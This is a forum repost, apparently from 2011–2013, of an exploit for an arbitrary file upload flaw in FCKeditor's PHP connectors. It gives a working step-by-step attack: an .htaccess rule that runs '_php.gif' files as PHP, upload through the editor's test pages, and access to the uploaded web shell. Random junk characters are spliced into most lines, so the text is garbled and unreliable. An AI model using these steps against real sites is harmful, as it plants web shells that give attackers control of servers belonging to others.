FCKeditor所有php版本Upload上传漏洞
$ e9 H. X4 n6 X' B; Q; B作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:071 `. _- y4 I1 j* p
减小字体 增大字体' t. s( f% E5 o" f/ L6 Q
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
; D7 g' ^. w% x1 g! e( k, s[+] Date: 2011$ Q; ]3 g% Q8 Q( X: j/ J) Y
[+] Author : sinesafe.cn. a5 `7 y; l+ i9 U3 n- @2 t
[+] Website : WwW.sinesafe.cn- S- |1 |" B8 s! W" c5 b- o
———————————————————- M @5 c: ?) {; m1 V" D! w2 Z
1.create a htaccess file:& C+ X+ l# F: J) s: W( H2 N+ V' F) \
code:. x0 K; E7 K3 F% f- h0 y* R: L
<FilesMatch “_php.gif”>! e/ z/ ? k" c
SetHandler application/x-httpd-php
2 o& y0 x1 P7 ]0 [0 F4 q( `</FilesMatch>/ o7 E7 c H. w% `) Q
" G2 Z5 T# e; t- B/ b2.Now upload this htaccess with FCKeditor.$ }3 q# P+ `" q: H: t# M; o
9 p1 A2 ?- ]6 G# I) ? J* H+ l6 _
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html' |- m, q. N7 u! ?7 Z& s
2 ^' L6 J7 l1 y8 T- s) Q
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
8 W8 M! Y9 l0 Y) I( l. X
0 x/ n t- d- x0 P% K( I———————————————————————————————-# h v8 ?) T& Q3 F
3.Now upload shell.php.gif with FCKeditor.
9 }+ W0 X& f3 t- j# V/ N) R4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.4 f8 e4 m7 M) S) Z
5.http://www.sinesafe.cn/anything/shell_php.gif& C5 J8 B9 T+ b% @# r v( ]) H
6.Now shell is available from server. |
# z9 P( T( G" ^* e$ V$ `. t+ @( z, @, [" J E
4 G' c* r0 ^* f* W5 K
|
发表于 2013-10-27 17:25:21
收藏
支持
反对